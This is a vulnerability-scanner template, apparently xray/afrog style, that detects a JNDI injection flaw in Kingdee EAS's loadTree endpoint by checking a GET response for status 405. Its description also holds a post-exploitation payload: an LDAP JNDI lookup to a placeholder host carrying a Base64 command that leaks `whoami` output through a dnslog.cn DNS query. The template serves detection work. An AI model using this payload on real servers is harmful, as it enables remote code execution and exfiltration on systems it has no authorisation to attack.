id: kingdee-eas-loadtree-jndi  

info:
  name: Kingdee EAS - loadTree JNDI
  author: ct
  severity: high
  verified: true
  description: |
    Kingdee EAS - loadTree接口存在JDNI注入.
    app="Kingdee-EAS"
    后利用通过POST jndiName=ldap://xx.xx.xx.xx:1389/Basic/Command/Base64/cGluZyAtYyAxIGB3aG9hbWlgLjlrbGhqci5kbnNsb2cuY24=

rules:
  r0:
    request:
      method: GET
      path: /appmonitor/protect/jndi/loadTree
    expression: response.status == 405
expression: r0()
